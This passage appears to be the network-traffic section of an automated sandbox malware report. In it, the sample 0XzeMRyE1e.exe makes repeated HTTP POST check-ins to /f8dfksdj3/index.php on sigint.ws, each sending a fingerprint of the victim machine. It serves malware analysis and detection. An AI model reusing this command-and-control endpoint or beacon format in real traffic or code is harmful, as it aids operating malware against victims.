                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:02.590540886 CEST | 3590 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:02 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              115 | 192.168.2.4 | 49894 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:55:03.266530037 CEST | 3590 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:03.449297905 CEST | 3591 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:03 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              116 | 192.168.2.4 | 49895 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:55:03.704176903 CEST | 3592 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:03.884037971 CEST | 3603 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:03 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              117 | 192.168.2.4 | 49896 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:55:05.115551949 CEST | 3603 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:05.297106981 CEST | 3604 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:05 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              118 | 192.168.2.4 | 49898 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:55:05.537739992 CEST | 3604 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:05.718848944 CEST | 3604 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:05 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              119 | 192.168.2.4 | 49899 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:55:05.935549974 CEST | 3605 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:06.119924068 CEST | 3606 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:06 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              12 | 192.168.2.4 | 49786 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:53:59.792798996 CEST | 3408 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:53:59.973313093 CEST | 3408 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:53:59 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              120 | 192.168.2.4 | 49900 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:55:06.323240042 CEST | 3606 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:06.505719900 CEST | 3607 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:06 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              121 | 192.168.2.4 | 49901 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:55:06.719831944 CEST | 3607 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:06.901846886 CEST | 3607 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:06 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              122 | 192.168.2.4 | 49902 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:55:07.107382059 CEST | 3608 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:07.288651943 CEST | 3608 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:07 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              123 | 192.168.2.4 | 49903 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:55:07.519813061 CEST | 3609 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:07.702017069 CEST | 3609 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:07 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              124 | 192.168.2.4 | 49904 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:55:07.924426079 CEST | 3610 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:08.106933117 CEST | 3610 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:08 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              125 | 192.168.2.4 | 49905 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:55:08.307583094 CEST | 3611 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:08.487366915 CEST | 3611 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:08 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              126 | 192.168.2.4 | 49906 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:55:08.703562021 CEST | 3612 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:08.887171030 CEST | 3612 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:08 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              127 | 192.168.2.4 | 49907 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:55:09.093755960 CEST | 3613 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:09.274606943 CEST | 3613 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:09 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              128 | 192.168.2.4 | 49908 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:55:09.504160881 CEST | 3614 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:09.686593056 CEST | 3614 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:09 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              129 | 192.168.2.4 | 49909 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:55:09.894068956 CEST | 3615 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:10.075850964 CEST | 3615 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:10 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              13 | 192.168.2.4 | 49787 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:00.206557035 CEST | 3409 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:00.384043932 CEST | 3409 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:00 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              130 | 192.168.2.4 | 49910 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:55:10.281176090 CEST | 3616 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:10.464629889 CEST | 3616 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:10 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              131 | 192.168.2.4 | 49911 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:55:10.674377918 CEST | 3617 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:10.860245943 CEST | 3617 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
